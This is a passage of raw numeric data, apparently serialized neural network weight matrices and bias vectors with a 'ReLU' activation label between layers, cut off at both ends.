0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2705, -0.829, 1.117, 0.08124, -0.213, -1.994, 0.3215, 0.1879, 0.2391, -0.1415, -0.11017, -0.03757, -0.1067, -1.183, -0.005142, 0.086, -0.2717, 0.0927, -0.2932, -0.3582, 0.1847, -0.002068, 0.09076, 0.3083, 0.332, -0.2913, 0.1257, -0.3232, 0.259, -2.365, -0.4414, 0.824, -0.8174, -0.3438, 0.3503, 0.747, 0.9336, 0.02615, -3.348, 1.983, 0.552, -0.6353, -0.7715, -0.563, 0.906, 0.3142, 0.1855, 0.03442, -0.3848, -0.4373], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.375, -0.1624, -0.795, -0.1542, -0.8213, 1.464, 0.339, 0.005108, -2.107, 0.5723, 1.785, -4.562, 0.3848, 0.4421, 0.003925, -0.4011, 0.1089, 0.4885, 0.1893, -5.633, 2.385, 0.282, -5.2, -2.477, -3.025, -1.706, 0.755, -0.3354, 3.12, -1.747, 0.2277, -2.07, 0.579, -0.06055, -0.1464, 0.1598, 3.535, -2.564, -0.1798, 0.11755, -4.164, -3.732, -0.0621, 0.991, -4.81, -2.074, 1.643, -0.01288, -0.2554, -0.01837], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.105, -1.213, -0.5503, 0.587, -0.561, -1.418, -0.015114, -1.688, 0.4167, 0.4915, 0.336, 0.657, -1.645, -3.111, 0.01377, 0.537, -6.22, 0.632, -2.621, -3.26, -0.931, -0.611, -2.701, 0.9106, 0.3098, -5.29, 0.07794, -0.1482, 0.839, -1.692, -0.3381, -0.446, -0.1708, -0.6753, 0.01285, 0.3315, -1.148, 1.278, -1.064, -0.887, 1.386, 0.6035, -0.263, -1.647, -3.684, 0.3423, -0.7617, -0.0362, -1.186, -1.864], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1367, -0.741, 0.8755, 0.10004, 0.0857, -0.7954, 0.1694, -0.812, -1.231, 0.0103, 0.2174, -0.9336, -0.0703, 0.013336, 0.005768, 0.01979, 0.1561, 0.0407, -0.199, -0.225, 0.3364, 0.03857, -0.1754, 0.1426, 0.05368, 0.1705, -0.1655, -0.2212, 0.2397, -1.263, 0.552, -0.1317, -0.03108, 0.2666, -0.1573, -0.707, 0.5146, -0.2103, -0.3306, -2.363, 0.2017, -0.2073, -0.7393, 0.07874, 0.2013, 0.09204, -0.03049, 0.01542, -0.0906, 0.2316], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.01793, 0.1102, -0.1842, -0.05157, -0.47, -0.715, 0.3464, 0.3528, 0.133, -0.3906, -0.10144, 0.02155, 0.282, 0.03534, -0.01756, -0.03592, -0.08875, 0.02301, 0.2051, 0.1111, -0.3298, 0.0514, 0.0177, 0.0737, -0.3853, -0.05588, -0.007904, -0.1377, 0.786, -0.04608, -0.02213, -0.03967, 0.05933, -0.1095, 0.311, 0.06354, -0.1519, -0.2737, -0.136, 0.402, -0.235, 0.0899, -0.0996, 0.233, -0.1357, -0.2585, 0.3232, -0.05246, 0.2788, 0.006836], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3755, 0.2478, 0.832, -1.12, -2.115, -1.055, 0.2834, 0.612, -0.0473, -0.711, -0.2578, -0.01929, 0.11975, -0.7607, 0.0475, -0.0475, 0.04932, 0.1398, 1.188, -0.2274, -0.004498, 0.0457, 0.01006, 0.1465, 1.022, 0.2888, 0.8525, -0.128, 0.7197, -14.57, 0.675, 0.9185, -0.3848, -0.3633, 0.5454, -0.7637, -1.297, 0.2847, 0.4326, 1.023, -0.7515, 0.2993, -1.793, 0.9487, 1.019, -0.1912, -0.828, 0.00784, 0.2068, 0.948], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.009735, -0.3872, -0.2012, 0.0377, -0.2002, -0.871, 0.02321, -0.2478, -0.2507, 0.0745, 0.3696, -0.05884, -0.1307, -0.10315, -0.02066, 0.238, -0.2544, -0.09735, -0.03326, -0.598, -0.1377, -0.2435, 0.05344, 0.2155, -0.6147, -0.155, 0.2537, -0.1279, 0.09174, -1.271, 0.1754, -1.88, -0.0522, -0.07214, -0.01839, -0.4624, -0.00539, 0.2524, 0.2834, -0.0781, -0.0559, 0.2654, -0.4692, 0.02795, 0.02704, -0.3457, -0.3015, 0.02832, -0.10486, -0.1146], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00993, -0.3315, 0.1033, 0.0201, 0.01952, -0.626, -0.06775, -0.1837, -0.4624, -0.01726, -0.224, 0.10455, 0.1371, -0.0645, -0.03217, -0.03088, 0.0913, 0.02051, 0.0784, 0.3398, 0.1416, -0.01668, -0.05222, 0.0668, 0.3616, 0.08514, -0.03772, 0.08435, -0.0488, 0.985, -0.1665, -0.3933, -0.2224, 0.05643, -0.01257, 0.0991, -0.1307, 0.0497, -0.08167, -0.06903, 0.0174, -0.3005, -0.1037, 0.05008, -0.06082, -0.013115, 0.0342, -0.01799, 0.0365, 0.03638], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.5425, -0.285, -4.3, -0.2778, 0.114, 1.074, -0.871, -1.1875, 0.83, 0.04843, 0.02162, -0.4443, -2.111, -0.0649, -0.031, -0.2001, 0.12115, -0.4453, -0.6206, -0.0349, 0.0399, -1.525, 0.138, 0.01543, 0.9497, 0.0693, 0.2025, 0.1611, 0.9575, 0.0032, -0.997, 0.5327, 0.0848, -0.5273, -0.143, 0.02785, 0.4111, -0.7056, -0.5464, -1.663, 0.2498, 0.0822, -0.355, -0.5933, -0.974, -0.0673, -0.5337, -0.0285, 0.5034, 0.2131], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.09375, -0.6147, 0.574, -0.9956, -0.2795, 0.1141, -0.07745, 0.05908, -0.476, 0.0294, -0.1934, -0.3816, 0.04407, -0.236, -0.03146, 0.056, -0.06335, -0.000429, -0.06995, -0.02309, -0.09656, -0.1698, -0.01988, -0.00419, 0.1338, -0.06885, -0.0953, -0.0446, -0.1105, 0.5483, -9.39, 0.27, -0.0331, -0.01894, -0.001501, -0.658, 0.3882, -0.01496, 0.1283, -0.6274, 0.00717, 0.078, -0.2888, -0.1488, -0.156, -0.1432, -0.06726, -0.01901, -0.1035, -0.3203], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.855, -0.8047, 3.867, 0.4275, 0.4436, -0.887, -0.05994, -2.729, 3.732, -0.248, 3.256, -0.915, -0.814, 0.4739, 0.001769, -0.2279, 0.00804, 0.3096, -1.226, 2.37, 0.3135, 0.697, -0.4956, 0.05487, 5.03, 0.3147, -1.281, -0.7954, -15.3, 1.467, 1.888, 0.2177, 0.156, 0.3909, 0.573, -2.488, -1.5625, 2.004, 0.33, 4.87, -2.945, -1.289, -1.08, 0.729, -1.541, 0.08765, 2.912, 0.00153, -0.2261, 0.945], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.06033, 0.885, 2.422, 0.2708, 0.00967, -0.0612, 0.596, 0.1554, 2.238, -0.1339, 0.0128, -0.4617, -0.2651, -0.1136, -0.02412, 0.2383, -0.1857, -0.1313, -0.1532, 0.2808, -0.1234, 0.004036, 0.1571, 0.02759, 1.074, -0.2866, -0.2369, -0.1556, -0.4658, 2.379, 0.2166, 0.0868, 0.048, 0.03445, 0.06052, -0.596, 0.546, 0.3076, 0.04654, -1.013, 0.1613, -0.0497, 0.149, -0.03793, 0.0885, -0.1559, 0.1246, 0.00963, 0.4258, -0.1531], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.10956, -0.688, 0.4155, -0.2169, 0.128, 0.1837, 0.2052, 0.02652, -0.05087, -0.01697, -0.1315, 0.0801, -0.01694, 0.1321, 0.01631, 0.03378, 0.0629, 0.1367, 0.1056, -0.626, 0.0661, 0.115, 0.1975, 0.1636, -0.1312, 0.0944, -0.1313, -0.1919, 0.0961, 0.0893, -1.969, -0.1137, 0.0805, 0.04068, 0.0469, -0.707, -0.3008, -0.00431, -0.01486, 0.05807, 0.2347, 0.02538, -0.1299, 0.2386, 0.275, 0.188, -0.05258, -0.004585, -0.07465, 0.0963], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.4182, -1.408, -2.723, -0.2366, -0.269, 0.3909, -0.25, 1.094, -4.78, -0.3564, 0.0507, 0.1711, -0.1875, -0.06088, 0.03973, -0.1699, 0.364, 0.2776, 0.8184, 0.549, 0.3638, -0.1631, 0.3733, 0.2062, -0.3857, 0.6367, 0.1921, -0.0663, -0.7188, -2.021, 0.2152, 0.1998, -0.4, 0.1759, 0.1736, -0.05038, -0.701, 0.3477, 0.3599, -3.57, 0.2277, -0.4368, -0.03983, 0.315, -0.4722, 0.622, -0.5684, -0.04132, 0.11475, 0.143], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2339, -0.2426, -0.0362, 0.2847, 0.2363, 0.675, 0.611, 1.0205, -0.503, 0.6196, -0.461, 0.8936, -0.7275, 0.2416, 0.05087, 0.3389, -0.913, -0.3762, -1.3545, -0.7104, -1.161, -0.2566, -0.1179, 0.2483, -0.9946, -1.358, 0.6377, -0.03217, -2.855, 0.4587, 0.4688, -0.5894, 0.308, 0.02448, 0.1609, 0.4163, -1.958, -1.085, 0.457, -0.8857, -0.89, -10.695, 0.1815, -2.66, -1.396, -2.621, -0.5835, -0.0409, -1.337, -0.3318], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1924, -0.879, 1.012, -0.2317, -0.01514, -0.3052, -0.885, -0.2642, 2.705, -0.1921, -0.0543, -0.3027, 0.4316, 0.501, 0.00559, -0.0635, 0.459, -0.1616, -0.2356, -0.7246, -0.11127, 0.02446, 0.63, 0.3384, 0.8286, -0.035, -0.0919, -0.05466, -2.371, 1.894, -0.0775, -0.04913, -1.244, 0.205, 0.0713, 0.1232, 0.913, 0.5947, -0.2242, -1.03, -1.638, 2.318, 0.1805, 0.01637, 0.1425, -0.636, 0.4834, 0.04028, -0.2913, 0.876]]
[0.343884, -0.148704, -0.182344, 2.09282, 0.0573921, 1.07278, -3.5375, 0.290246, 1.78528, 0.570392, 0.102578, -0.867694, -1.88844, -1.11489, -0.445675, 0.694016, 1.27762, -1.29112, -1.34225, -0.159671, 0.645223, 0.988629, 0.516151, -2.38274, 0.676756, 0.761867, 0.0567606, -0.222461, 1.86957, 1.05205, -0.107629, 0.0906623, 2.55632, 0.875174, 0.0827916, -1.16245, 1.19683, 0.119459, 0.0523826, -0.25144, 0.971201, 0.414523, 0.559316, 0.711265, -3.24478, 0.58, 0.165873, -1.29327, -0.331041, -0.654165, 0.344, -0.1487, -0.1824, 2.094, 0.0574, 1.073, -3.537, 0.2903, 1.785, 0.5703, 0.1026, -0.8677, -1.889, -1.115, -0.4456, 0.694, 1.277, -1.291, -1.342, -0.1597, 0.645, 0.989, 0.516, -2.383, 0.677, 0.7617, 0.05676, -0.2224, 1.869, 1.052, -0.1076, 0.09064, 2.557, 0.875, 0.08276, -1.162, 1.197, 0.11945, 0.05237, -0.2515, 0.971, 0.4146, 0.559, 0.7114, -3.244, 0.58, 0.1659, -1.293, -0.331, -0.6543]
ReLU
[[0.0198897, -0.0404527, -0.277591, 0.0392536, 0.603609, 0.359966, -1.15858, 0.0895053, -0.0162616, 0.620436, -1.25868, 0.435105, 0.458625, 0.149091, 0.410564, 0.178846, -0.117309, 0.155218, -0.00361469, 0.0942395, -0.264847, -0.46865, -0.237021, -0.536885, -0.0563038, 0.232914, -0.0612577, 0.288811, -0.465449, 0.132133, -0.0728266, -1.02416, -0.0315447, -0.108128, -0.146657, 1.54259, -0.102172, -0.348272, -0.108634, 0.0917521, 0.118776, -0.490799, 0.0487253, 1.00787, 0.329056, -0.0960519, 0.188903, -0.556117, -0.321128, -4.48875, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.12478, 0.0416074, 0.0687742, -0.0500863, 0.377188, -0.0149096, 0.692364, 0.0749262, 0.137186, 0.0966477, -0.00770169, 0.691132, 0.0518415, 0.00739989, -0.106759, 0.215572, -0.100271, 0.00862341, 0.442313, 0.327501, 0.0345781, 0.0836259, -0.105687, 0.0685188, -0.153703, 0.546476, 0.0165681, -0.17239, 0.0519638, -0.010236, -0.214114, -0.363951, -0.0305532, -0.405473, 0.0400872, 0.716206, -0.0141947, -0.12781, -0.1698, 0.00784271, 0.0831355, -0.337734, -0.240157, 0.157107, 0.021761, 0.0733449, 0.00928964, 0.0824242, 0.0293015, 0.0386904, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.47445, -1.20772, -0.533325, -0.092422, 2.52431, -0.945134, 1.17228, 0.198356, -0.261637, 0.483425, -0.601054, -0.0990522, 0.575311, -0.828567, -0.515617, 1.23971, -0.646088, 1.26715, 2.29021, 0.252444, 0.268733, 0.842372, -0.183175, 0.150304, 0.254647, -0.0738135, -0.198423, 0.290538, -0.149387, -0.218876, -0.374599, -4.90366, -0.078181, -0.632357, 0.407041, -0.481849, 0.105639, -0.628227, -0.168271, 0.66638, 0.77713, 0.53316, 0.469191, 1.29148, -1.13223, 0.0211952, 0.61959, -7.74552, -0.105717, 3.23942, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.00951057, -0.00195054, 0.0289095, -0.082063, 0.32719, 0.0505229, -9.71707, 0.00550752, 0.0622835, -0.0572328, -0.197326, 0.0323883, -0.0442943, -0.00143272, 0.00060128, 0.118867, 0.0141389, 0.108605, -0.01479, 0.191224, -0.0560275, 0.0698511, 0.0638019, 0.00518239, 0.0124155, 0.0587427, -0.00408959, -0.0519665, -0.0166309, 0.0210846, -0.196554, 0.0853336, 0.00094628, 0.0446118, -0.084501, -0.312124, -0.000244352, -0.031797, -0.0342911, -0.013044, 0.0531631, -0.211627, -0.0555921, -0.0192542, -4.24262, 0.0448343, -0.143113, 0.0922184, -0.0254486, 0.0659032, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.935307, -2.01348, 0.25284, -0.0538865, -0.449774, 0.944573, -0.394612, -0.41814, -0.85797, -0.238316, 0.148548, 3.34056, -0.384637, -0.152855, 0.0564274, -1.65735, -1.35135, -0.982294, -1.02439, 0.162213, 0.215109, -0.0248712, -7.45046, 0.213618, 0.0702675, -2.46763, -5.18885, 0.44185, 0.00103554, 0.40183, 0.402682, -1.7952, -0.360388, 0.967219, -2.39407, 0.0189563, 0.114188, -0.3066, 1.18485, -0.961912, -0.569975, 1.07923, -1.90965, 1.77983, 0.111557, -0.436792, -6.99963, -0.744146, -0.0400978, 0.832671, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.201806, 0.251866, -0.490096, -0.0280296, 0.539718, 0.0679513, -0.218965, -0.0102342, 0.141746, 0.29907, -0.0814449, 0.347362, 0.240542, -0.017297, -0.201359, -0.296228, -0.00980131, -0.133967, 0.133377, 0.478977, 0.048804, -0.0826984, -0.00102992, -0.182537, -0.0828709, 0.0769363, 0.0745554, 0.150575, -0.0278276, -0.0185181, 0.163408, -0.0303076, -0.0720884, 0.16526, 0.220965, 0.302963, 0.00507369, 0.0975644, -0.00625541, 0.000733538, 0.138197, -0.326087, 0.532902, -0.442966, 0.0558153, 0.0558344, -1.68548, 0.0454977, -0.0107947, 0.208993, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0666847, -0.0253962, 0.308655, 0.0338291, 0.331749, 0.097411, -2.07588, -0.201514, 0.130892, -0.183953, 0.00742339, 0.528813, 0.129563, 0.0518769, -0.136421, 0.139617, -0.151884, 0.0618889, -0.398714, -0.471988, -0.0115594, 0.0733779, 0.451285, -0.0740297, 0.474319, 0.0213045, 0.166832, -0.197219, -0.0465246, 0.178251, -0.227263, -0.0453916, -0.122528, -0.0650089, -0.146671, -0.0821081, 0.0136386, 0.154392, 0.15866, -0.282446, -0.0732708, -1.45058, -0.0336267, -0.0989725, -0.349539, -0.00940821, -0.0985911, 0.0211226, 0.0598756, -4.29466, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-5.00427, 0.196102, 0.0715269, -0.0464746, -0.571942, -0.607968, -3.72613, -2.35452, -0.0107038, -0.0102338, -0.162854, -0.169748, 0.266244, 0.322437, 0.394769, -0.000819109, -0.140204, 0.128465, 0.446514, 0.293356, 0.0226001, 0.0616584, -0.198242, -1.2365, 0.0117411, -0.482936, 0.334818, -0.11962, -0.193818, -0.161632, -0.190207, 0.0833688, -0.0630484, -0.22069, -0.0517292, -0.0874935, -0.13844, 0.00177128, -0.435294, 0.287744, 0.299813, -0.409951, 0.205094, 0.368056, -0.0311629, -0.237496, 0.294526, -0.0545813, -0.0305311, 0.188067, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.230212, 0.257645, 0.0558687, -0.129267, 0.124365, -0.153042, -13.5548, -0.0180085, -0.168386, -0.0382196, -0.242393, -0.101956, 0.0633759, 0.0192752, -0.095468, 0.0464098, -0.0563242, 0.0288101, 0.287405, -0.0197931, -0.0514541, 0.35247, 0.0311615, 0.052715, 0.077579, -0.0846086, 0.110325, 0.0709342, -0.110234, -0.00283828, 0.0502477, 0.0251561, -0.0294567, -0.0740749, 0.0304668, 0.486518, -0.0526309, 0.00238113, -0.290495, 0.071764, 0.150426, 0.367982, -0.0124935, 0.263409, -0.0547299, -0.0813385, 0.305185, 0.108303, 0.0164854, 0.16985, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.275657, -0.209983, -0.144089, 0.0174152, -0.26319, -0.00676406, -0.141265, 0.0150905, -0.018708, 0.082582, -0.0074294, -0.220016, 0.0831982, 0.067921, 0.0095902, -0.0334255, -0.0397525, 0.107058, -0.239416, -0.0410243, 0.0176434, -0.115426, 0.0566601, 0.00786331, -0.195441, -0.526434, 0.120704, -0.067479, -0.00943924, 0.0225083, -0.054562, 0.63492, 0.0255949, -0.167422, 0.0519159, 0.435645, -0.0195408, 0.0406585, -0.0303667, 0.0325866, 0.0999786, -0.116919, -0.017108, 0.216892, -0.232325, 0.0860438, -0.0495868, -0.0982608, 0.0234298, 0.00379567, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.272714, 0.829244, -3.90107, -2.10402, -5.10687, -8.75217, 0.0465555, -0.53462, 0.487414, 0.210014, 0.78361, 0.139895, -3.02957, 1.83718, -1.02206, 2.92484, -0.819569, -2.38438, 0.344952, -0.0429874, 0.603345, 1.83056, 5.02666, -0.081087, 2.88693, -6.58415, -5.555, 1.20216, 0.584584, 1.64198, 0.823565, -20.0916, -3.36609, -0.118841, 3.16146, 0.452014, -1.20608, -9.21369, 2.93469, -0.140688, -2.55597, 2.59165, -1.88994, 0.887057, -0.172963, -0.828126, 0.102691, 